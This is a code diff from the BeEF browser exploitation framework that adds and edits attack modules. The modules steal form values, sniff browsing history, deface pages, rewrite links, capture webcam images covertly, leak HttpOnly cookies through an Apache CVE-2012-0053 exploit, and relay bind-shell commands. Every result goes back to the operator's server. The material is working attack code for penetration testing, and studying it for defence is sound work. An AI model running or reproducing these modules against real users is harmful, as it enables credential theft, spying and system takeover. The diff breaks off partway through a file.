+	facebook: 'https://s-static.ak.facebook.com/rsrc.php/v1/yJ/r/vOykDL15P0R.png',
+	twitter: 'https://twitter.com/images/spinner.gif',
+	digg: 'http://cdn2.diggstatic.com/img/sprites/global.5b25823e.png',
+	reddit: 'http://www.redditstatic.com/sprite-reddit.pZL22qP4ous.png',
+	hn: 'http://ycombinator.com/images/y18.gif',
+	stumbleupon: 'http://cdn.stumble-upon.com/i/bg/logo_su.png',
+	wired: 'http://www.wired.com/images/home/wired_logo.gif',
+	xkcd: 'http://imgs.xkcd.com/s/9be30a7.png',
+	linkedin: 'http://static01.linkedin.com/scds/common/u/img/sprite/sprite_global_v6.png',
+	slashdot: 'http://a.fsdn.com/sd/logo_w_l.png',
+	myspace: 'http://cms.myspacecdn.com/cms/x/11/47/title-WhatsHotWhite.jpg',
+	engadget: 'http://www.blogsmithmedia.com/www.engadget.com/media/engadget_logo.png',
+        lastfm: 'http://cdn.lst.fm/flatness/anonhome/1/anon-sprite.png',
+        pandora: 'http://www.pandora.com/img/logo.png',
+        youtube: 'http://s.ytimg.com/yt/img/pixel-vfl3z5WfW.gif',
+        yahoo: 'http://l.yimg.com/ao/i/mp/properties/frontpage/01/img/aufrontpage-sprite.s1740.gif',
+        google: 'https://www.google.com/intl/en_com/images/srpr/logo3w.png',
+        hotmail: 'https://secure.shared.live.com/~Live.SiteContent.ID/~16.2.8/~/~/~/~/images/iconmap.png',
+        cnn: 'http://i.cdn.turner.com/cnn/.element/img/3.0/global/header/intl/hdr-globe-central.gif',
+        bbc: 'http://static.bbc.co.uk/frameworks/barlesque/1.21.2/desktop/3/img/blocks/light.png',
+        reuters: 'http://www.reuters.com/resources_v2/images/masthead-logo.gif',
+        wikipedia: 'http://upload.wikimedia.org/wikipedia/en/b/bc/Wiki.png',
+        amazon: 'http://g-ecx.images-amazon.com/images/G/01/gno/images/orangeBlue/navPackedSprites-US-22._V183711641_.png',
+        ebay: 'http://p.ebaystatic.com/aw/pics/au/logos/logoEbay_x45.gif',
+        newegg: 'http://images10.newegg.com/WebResource/Themes/2005/Nest/neLogo.png',
+        bestbuy: 'http://images.bestbuy.com/BestBuy_US/en_US/images/global/header/hdr_logo.gif',
+	walmart: 'http://i2.walmartimages.com/i/header_wide/walmart_logo_214x54.gif',
+	perfectgirls: 'http://www.perfectgirls.net/img/logoPG_02.jpg',
+        abebooks: 'http://www.abebooks.com/images/HeaderFooter/siteRevamp/AbeBooks-logo.gif',
+	msy: 'http://msy.com.au/images/MSYLogo-long.gif',
+	techbuy: 'http://www.techbuy.com.au/themes/default/images/tblogo.jpg',
+	borders: 'http://www.borders.com.au/images/ui/logo-site-footer.gif',
+	mozilla: 'http://www.mozilla.org/images/template/screen/logo_footer.png',
+	anandtech: 'http://www.anandtech.com/content/images/globals/header_logo.png',
+	tomshardware: 'http://m.bestofmedia.com/i/tomshardware/v3/logo_th.png',
+	shopbot: 'http://i.shopbot.com.au/s/i/logo/en_AU/shopbot.gif',
+	staticice: 'http://staticice.com.au/images/banner.jpg',
+  };
+
+  var sites = [];
+  for (var k in tests)
+    sites.push(k);
+   sites.reverse();
+
+   vp = visipisi.webkit;
+   var first_site = sites.pop();
+   var end = function() {
+    	beef.net.send("<%= @command_url %>", <%= @command_id %>, 'results='+prepResult(vp_result));
+   }
+   vp(tests[first_site], function(result) {
+	visipisiCB(vp, end, sites, tests, first_site, result);
+    });
+}
+
+function prepResult(results){
+    var result_str ='<br>';
+    for(r in results){
+      result_str += r + ':' + results[r]+'<br>';
+    }
+    return result_str;
+}
 
 beef.execute(function() { 
+  if(beef.browser.isC() == 1){
+	getVisitedDomains();
+
+  } else {  
    urls = undefined;
    exec_next = null;
    start_stuff();
+ }
 });
 
 	

modules/browser/get_visited_domains/config.yaml

@@ -9,8 +9,8 @@ beef:
             enable: true
             category: "Browser"
             name: "Get Visited Domains"
-            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
-            authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
+            description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done by Michal Zalewski at http://lcamtuf.coredump.cx/cachetime/"
+            authors: ["@keith55", "oxplot", "quentin"]
             target:
-                working: ["FF", "IE"]
-                not_working: ["O", "C", "S"]
+                working: ["FF", "IE", "O"]
+                not_working: ["C", "S"]

modules/browser/hooked_domain/deface_web_page_component/command.js

@@ -0,0 +1,14 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var result = $j('<%= @deface_selector %>').each(function() {
+		$j(this).html('<%= @deface_content %>');
+	}).length;
+
+    beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Defaced "+ result +" elements");
+});

modules/browser/hooked_domain/deface_web_page_component/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        deface_web_page_component:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace Component (Deface)"
+            description: "Overwrite a particular component of the hooked page."
+            authors: ["antisnatchor", "xntrik"]
+            target:
+                user_notify: ['ALL']

modules/browser/hooked_domain/deface_web_page_component/module.rb

@@ -0,0 +1,22 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Deface_web_page_component < BeEF::Core::Command
+
+  def self.options
+    return [
+		{ 'name' => 'deface_selector', 'description' => 'The jQuery Selector to rewrite', 'ui_label' => 'Target Selector (Using jQuery\'s selector notation)', 'value' => '.headertitle', 'width'=>'200px' },
+		{ 'name' => 'deface_content', 'description' => 'The HTML to replace within the target', 'ui_label' => 'Deface Content', 'value' => 'BeEF was ere', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+
+  end
+
+end

modules/browser/hooked_domain/get_form_values/command.js

@@ -0,0 +1,28 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	var form_data = new Array();
+
+	// loop through all forms
+	for (var f=0; f < document.forms.length; f++) {
+		// store type,name,value for all input fields
+		for (var i=0; i < document.forms[f].elements.length; i++) {
+			form_data.push(new Array(document.forms[f].elements[i].type, document.forms[f].elements[i].name, document.forms[f].elements[i].value));
+		}
+	}
+
+	// return form data
+	if (form_data.length) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+JSON.stringify(form_data));
+	// return if no input fields were found
+	} else {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=Could not find any forms on '+window.location);
+	}
+
+});
+

modules/browser/hooked_domain/get_form_values/config.yaml

@@ -5,11 +5,11 @@
 #
 beef:
     module:
-        zenoss_daemon_csrf:
+        get_form_values:
             enable: true
-            category: "Exploits"
-            name: "Zenoss 3.x Daemon CSRF"
-            description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server."
+            category: ["Browser", "Hooked Domain"]
+            name: "Get Form Values"
+            description: "This module retrieves the name, type, and value of all input fields for all forms on the page."
             authors: ["bcoles"]
             target:
                 working: ["ALL"]

modules/browser/hooked_domain/get_form_values/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Get_form_values < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['form_data'] = @datastore['form_data']
+		save content
+	end
+
+end

modules/browser/hooked_domain/link_rewrite_click_events/command.js

@@ -0,0 +1,10 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+    beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result='+beef.dom.rewriteLinksClickEvents('<%= @url %>')+' links rewritten to <%= @url %>');
+});
+

modules/browser/hooked_domain/link_rewrite_click_events/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        link_rewrite_click_events:
+            enable: true
+            category: ["Browser", "Hooked Domain"]
+            name: "Replace HREFs (Click Events)"
+            description: "This module will rewrite all the href attributes of all matched links using Bilawal Hameed's updating of click event handling. This will hide the target site for all updated links."
+            authors: ["xntrik", "@bilawalhameed", "passbe"]
+            target:
+                not_working: ["O"]
+                working: ["ALL"]

modules/browser/hooked_domain/link_rewrite_click_events/module.rb

@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Link_rewrite_click_events < BeEF::Core::Command
+  
+  def self.options
+    return [
+        { 'ui_label'=>'URL', 'name'=>'url', 'description' => 'Target URL', 'value'=>'http://beefproject.com/', 'width'=>'200px' }
+    ]
+  end
+
+  def post_execute
+    save({'result' => @datastore['result']})
+  end
+  
+end

modules/browser/webcam/command.js

@@ -22,7 +22,7 @@ beef.execute(function() {
     
     
     //These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
-    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){  }';
+    var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "image="+picture); }; function allPicturesTaken(){  }';
     
     //This function is called by swfobject, if if fails to add the flash file to the page
     

modules/browser/webcam_html5/command.js

@@ -0,0 +1,50 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+
+beef.execute(function() {
+    var vid_id = beef.dom.generateID();
+    var can_id = beef.dom.generateID();
+    var vid_el = beef.dom.createElement('video',{'id':vid_id,'style':'display:none;','autoplay':'true'});
+    var can_el = beef.dom.createElement('canvas',{'id':can_id,'style':'display:none;','width':'640','height':'480'});
+    $j('body').append(vid_el);
+    $j('body').append(can_el);
+
+    var ctx = can_el.getContext('2d');
+
+    var localMediaStream = null;
+
+    var cap = function() {
+        if (localMediaStream) {
+            ctx.drawImage(vid_el,0,0);
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'image='+can_el.toDataURL('image/png'));
+        } else {
+            beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=something went wrong');
+        }
+    }
+
+    window.URL = window.URL || window.webkitURL;
+    navigator.getUserMedia  = navigator.getUserMedia || navigator.webkitGetUserMedia || navigator.mozGetUserMedia || navigator.msGetUserMedia;
+
+    navigator.getUserMedia({video:true},function(stream) {
+        vid_el.src = window.URL.createObjectURL(stream);
+        localMediaStream = stream;
+        setTimeout(cap,2000);
+
+    }, function(err) {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>, 'result=getUserMedia call failed');
+    });
+
+
+
+
+});
+
+
+
+
+

modules/browser/webcam_html5/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_html5:
+            enable: true
+            category: "Browser"
+            name: "Webcam HTML5"
+            description: "This module will leverage HTML5s WebRTC to capture webcam images. Only tested in Chrome, and it will display a dialog to ask if the user wants to enable their webcam."
+            authors: ["xntrik"]
+            target:
+                 user_notify: ["C"]
+                 unknown: ["All"]

modules/browser/webcam_html5/module.rb

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+require 'base64'
+class Webcam_html5 < BeEF::Core::Command
+  
+	def post_execute 
+		content = {}
+		content["result"] = @datastore["result"] if not @datastore["result"].nil?
+    content["image"] = @datastore["image"] if not @datastore["image"].nil?
+		save content
+	end
+
+end

modules/browser/webcam_permission_check/cameraCheck.as

@@ -0,0 +1,54 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// Source ActionScript for cameraCheck.swf
+package {
+
+    import flash.display.Sprite;
+    import flash.external.ExternalInterface;
+    import flash.media.Camera;
+    import flash.system.Security;
+    import flash.system.SecurityPanel;
+
+    public class CamCheck extends Sprite {
+
+        var _cam:Camera;
+
+        public function CamCheck() {
+
+            if (Camera.isSupported)     {
+                this._cam = Camera.getCamera();
+
+                if (!this._cam) {
+
+	                //Either the camera is not available or some other error has occured
+                    ExternalInterface.call("naPermissions");
+
+                } else if (this._cam.muted) {
+
+	                //The user has not allowed access to the camera
+                    ExternalInterface.call("noPermissions");
+
+                    // Uncomment this show the privacy/security settings window
+                    //Security.showSettings(SecurityPanel.PRIVACY);
+                } else {
+
+                    //The user has allowed access to the camera
+                    ExternalInterface.call("yesPermissions");
+                }
+
+            } else {
+
+                //Camera Not Supported
+                ExternalInterface.call("naPermissions");
+
+            }
+
+        }
+
+    }
+
+}

modules/browser/webcam_permission_check/command.js

@@ -0,0 +1,79 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+
+beef.execute(function() {
+    
+       
+    //These 3 functions [naPermissions() The camera is not available or not supported
+    //					 yesPermissions() The user is allowing access to the camera / mic
+    //					yesPermissions() The user has not allowed access to the camera / mic
+    // Flash will invoke these functions directly.
+    //var js_functions = '<script>function noPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has not allowed  BeEF to access the camera :("); }; function yesPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D"); }; function naPermissions() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/"); }; ';
+
+    //This function is called by swfobject, if if fails to add the flash file to the page
+    
+    //js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
+
+    //These functions are global so they can accessed by the cameraCheck.swf file
+
+    noPermissions = function() {
+        beef.net.send("<%= @command_url %>",<%= @command_id %>,"result=The user has not allowed BeEF to access the camera :(");
+    }
+
+    yesPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has  allowed  BeEF to access the camera :D");
+    }
+
+    naPermissions = function() {
+        beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Camera not supported / available :/&unmount=true");
+    }
+
+    //After the swfobject loads the SWF file, this callback sends a status back to BeEF
+
+    var swfobjectCallback = function(e) {
+        if(e.success){
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");
+        } else {
+            beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");
+        }
+    }
+
+
+    //This is the DIV for the flash object
+    
+    var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:1px;height:1px;opacity:0.8;"></div>';
+    $j('body').append(body_flash_container);
+
+    // Lets execute swfobject.js
+    // If it works, we then run it to embed the swf file into the above div
+    $j.getScript(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/swfobject.js',function(data,txtStatus,jqxhr) {
+        var flashvars = {};
+        var parameters = {};
+        parameters.scale = "noscale";
+        parameters.wmode = "opaque";
+        parameters.allowFullScreen = "true";
+        parameters.allowScriptAccess = "always";
+        var attributes = {};
+        swfobject.embedSWF(beef.net.httpproto+'://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf', "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);
+    });
+        
+    //A library that helps include the swf file
+    //var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
+    
+    //This is the javascript that actually calls the swfobject library to include the swf file 
+    //var include_script = '<script>var flashvars = {}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/cameraCheck.swf", "main", "1", "1", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
+    
+
+    //Add flash content
+    //$j('body').append(js_functions, swfobject_script, body_flash_container, include_script);
+    
+});
+
+
+
+
+

modules/browser/webcam_permission_check/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        webcam_permission_check:
+            enable: true
+            category: "Browser"
+            name: "Webcam Permission Check"
+            description: "This module will check to see if the user has allowed the BeEF domain (or all domains) to access the Camera and Mic with Flash. This module is transparent and should not be detected by the user (ie. no popup requesting permission will appear)"
+            authors: ["@bw_z"]
+            target:
+                 working: ["All"]

modules/browser/webcam_permission_check/module.rb

@@ -0,0 +1,19 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+
+class Webcam_permission_check < BeEF::Core::Command
+  def pre_send
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/cameraCheck.swf', '/cameraCheck', 'swf')
+      BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.bind('/modules/browser/webcam_permission_check/swfobject.js', '/swfobject', 'js')
+  end
+  
+  def post_execute 
+
+  	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/cameraCheck.swf')
+	BeEF::Core::NetworkStack::Handlers::AssetHandler.instance.unbind('/swfobject.js')
+  end
+
+end

modules/debug/test_beef_debug/command.js

@@ -0,0 +1,17 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+beef.execute(function() {
+
+	try {
+		var msg = "<%= @msg.gsub(/"/, '\\"') %>";
+		beef.debug(msg);
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=called the beef.debug() function. Check the developer console for your debug message.');
+	} catch(e) {
+		beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=something went wrong&error='+e.message);
+	}
+
+});

modules/debug/test_beef_debug/config.yaml

@@ -0,0 +1,16 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_beef_debug:
+            enable: true
+            category: "Debug"
+            name: "Test beef.debug()"
+            description: "Test the 'beef.debug()' function. This function wraps 'console.log()'"
+            authors: ["bcoles"]
+            target:
+                 working: ["All"]
+                 not_working: ["IE"]

modules/debug/test_beef_debug/module.rb

@@ -0,0 +1,20 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_beef_debug < BeEF::Core::Command
+
+  def self.options
+    return [
+          {'name' => 'msg', 'description' => 'Debug Message', 'ui_label' => 'Debug Message', 'value' => "Test string for beef.debug() function", 'type' => 'textarea', 'width' => '400px', 'height' => '50px' }
+    ]
+  end
+
+  def post_execute
+    content = {}
+    content['Result'] = @datastore['result']
+    save content
+  end
+
+end

modules/debug/test_return_image/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        test_return_image:
+            enable: true
+            category: "Debug"
+            name: "Return Image"
+            description: "This module will test returning a PNG image as a base64 encoded string. The image should be rendered in the BeEF web interface."
+            authors: ["bcoles"]
+            target:
+                working: ["ALL"]

modules/debug/test_return_image/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Test_return_image < BeEF::Core::Command
+  
+  def post_execute
+    content = {}
+    content['image'] = @datastore['image']
+    save content
+  end
+
+end

modules/exploits/apache_cookie_disclosure/command.js

@@ -0,0 +1,75 @@
+//
+// Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+// Browser Exploitation Framework (BeEF) - http://beefproject.com
+// See the file 'doc/COPYING' for copying permission
+//
+
+// BASED ON https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
+
+beef.execute(function() {
+
+	function setCookies (good) {
+
+		var str = "";
+		
+		for (var i=0; i< 819; i++) {
+			str += "z";
+		}
+		
+		for (i = 0; i < 10; i++) {
+			
+			if (good) {		// Expire evil cookie
+				var cookie = "beef" + i + "=;expires=" + new Date(+new Date()-1).toUTCString() + "; path=/;";
+			} else {		// Set evil cookie
+				var cookie = "beef" + i + "=" + str + "; path=/";
+			}
+		document.cookie = cookie;
+		}
+	}
+
+	function makeRequest() {
+		setCookies();
+
+		function parseCookies () {
+			var cookie_dict = {};
+			
+			// React on 400 status
+			if (xhr.readyState === 4 && xhr.status === 400) {
+				
+				// Replace newlines and match <pre> content
+				var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
+				
+				if (content.length) {
+					
+					// Remove "Cookie:" prefix
+					content = content[1].replace("Cookie: ", "");
+					
+					var cookies = content.replace(/beef\d=z+;?/g, '').split(/;/g);
+					
+					// Add cookies to object
+					for (var i=0; i<cookies.length; i++) {
+						var s_c = cookies[i].split('=',2);
+						cookie_dict[s_c[0]] = s_c[1];
+					}
+				}
+				
+				// Unset malicious cookies
+				setCookies(true);
+	
+				var result = JSON.stringify(cookie_dict);
+	
+				beef.net.send("<%= @command_url %>", <%= @command_id %>, "cookies="+result);
+	
+			}
+		}
+		
+		// Make XHR request
+		var xhr = new XMLHttpRequest();
+		xhr.onreadystatechange = parseCookies;
+		xhr.open("GET", "/", true);
+		xhr.send(null);
+	}
+
+	makeRequest();
+
+});

modules/exploits/apache_cookie_disclosure/config.yaml

@@ -0,0 +1,15 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+beef:
+    module:
+        apache_cookies:
+            enable: true
+            category: "Exploits"
+            name: "Apache Cookie Disclosure"
+            description: "This module exploits CVE-2012-0053 in order to read the victim's cookies, even if issued with the HttpOnly attribute. The exploit only works if the target server is running Apache HTTP Server 2.2.0 through 2.2.21."
+            authors: ["gcattani"]
+            target:
+                working: ["All"]

modules/exploits/apache_cookie_disclosure/module.rb

@@ -0,0 +1,14 @@
+#
+# Copyright (c) 2006-2013 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+class Apache_cookies < BeEF::Core::Command
+
+	def post_execute
+		content = {}
+		content['apache_cookies'] = @datastore['apache_cookies']
+		save content
+	end
+
+end

modules/exploits/beefbind/beef_bind_shell/command.js

@@ -9,6 +9,7 @@ beef.execute(function () {
     var rport = '<%= @rport %>';
     var path = '<%= @path %>';
     var cmd = '<%= @cmd %>';
+    var shellcode ='<%= @shellcode %>';
 
     var uri = "http://" + rhost + ":" + rport + path;
 
@@ -31,15 +32,15 @@ beef.execute(function () {
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
                 var result = strip_output(xhr.responseText);
-                console.log("result.length: " + result.length);
+                beef.debug("result.length: " + result.length);
                 if(result.length != 0){
-                    console.log("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
+                    beef.debug("get_additional_cmd_results - readyState == 4: request [" + counter + "]\r\n" + result);
                     beef.net.send("<%= @command_url %>", <%= @command_id %>, result);
                         counter++;
                         setTimeout("get_additional_cmd_results()",500);
                         }
              }else{ // No more command results, ready to send another command.
-                console.log("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
+                beef.debug("get_additional_cmd_results - readyState != 4: request [" + counter + "]");
             }
         };
         xhr.open("GET", uri, false);
@@ -51,9 +52,9 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             if(xhr.readyState == 4){
-                console.log("get_prompt: Retrieved prompt");
+                beef.debug("get_prompt: Retrieved prompt");
                 var prompt = strip_output(xhr.responseText);
-                console.log(prompt);
+                beef.debug(prompt);
                 beef.net.send("<%= @command_url %>", <%= @command_id %>, prompt);
 
                 //send command
@@ -68,12 +69,16 @@ beef.execute(function () {
         xhr = new XMLHttpRequest();
         xhr.onreadystatechange = function(){
             var cmd_result = strip_output(xhr.responseText);
-            console.log(cmd_result);
+            beef.debug(cmd_result);
             beef.net.send("<%= @command_url %>", <%= @command_id %>, cmd_result);
         };
         xhr.open("POST", uri, false);
         xhr.setRequestHeader("Content-Type", "text/plain");
-        command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+	if (shellcode == 'Linux'){
+            command = "cmd=" + command + "\n"; // very important only LF
+        }else{
+            command = "cmd=" + command + "\r\n"; // very important CRLF, otherwise the shellcode returns "More?"
+        }
         xhr.send(command);
         setTimeout("get_additional_cmd_results()",500);
     };

modules/exploits/beefbind/beef_bind_shell/module.rb

@@ -10,7 +10,11 @@ class Beef_bind_shell < BeEF::Core::Command
       { 'name' => 'rhost', 'ui_label' => 'Host', 'value' => '127.0.0.1'},
       { 'name' => 'rport', 'ui_label' => 'BeEF Bind Port', 'value' => '4444'},
       { 'name' => 'path', 'ui_label' => 'Path', 'value' => '/'},
-      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'}
+      { 'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'hostname'},
+      { 'name' => 'shellcode', 'type' => 'combobox', 'ui_label' => 'BeEF Bind Shellcode', 'store_type' => 'arraystore',
+          'store_fields' => ['shellcode'], 'store_data' => [['Windows'],['Linux']],
+          'valueField' => 'shellcode', 'displayField' => 'shellcode', 'mode' => 'local', 'autoWidth' => true
+        }
 		]
 	end
 

modules/exploits/beefbind/beef_bind_staged_deploy/command.js

@@ -295,7 +295,7 @@ beef.execute(function () {
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
+                beef.debug("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
                 XMLHttpRequest.prototype.sendAsBinary = function(datastr) {
                     function byteValue(x) {
                         return x.charCodeAt(0) & 0xff;
@@ -310,7 +310,7 @@ beef.execute(function () {
             log("send_stager: stager sent.");
             stager_successfull = true;
         }catch(exception){
-            console.log("!!! Exception: " + exception);
+            beef.debug("!!! Exception: " + exception);
             // Check for PortBanning exceptions:
             //NS_ERROR_PORT_ACCESS_NOT_ALLOWED: Establishing a connection to an unsafe or otherwise banned port was prohibited
             if(exception.toString().indexOf('NS_ERROR_PORT_ACCESS_NOT_ALLOWED') != -1){
@@ -335,13 +335,13 @@ beef.execute(function () {
             var uri = "http://" + rhost + ":" + rport + path;
 
             xhr = new XMLHttpRequest();
-            console.log("uri: " + uri);
+            beef.debug("uri: " + uri);
             xhr.open("POST", uri, true);
             xhr.setRequestHeader("Content-Type", "text/plain");
 
             // this is required only with WebKit browsers.
             if (typeof XMLHttpRequest.prototype.sendAsBinary == 'undefined' && Uint8Array) {
-                console.log("WebKit browser: Patched XmlHttpRequest to support sendAsBinary.");
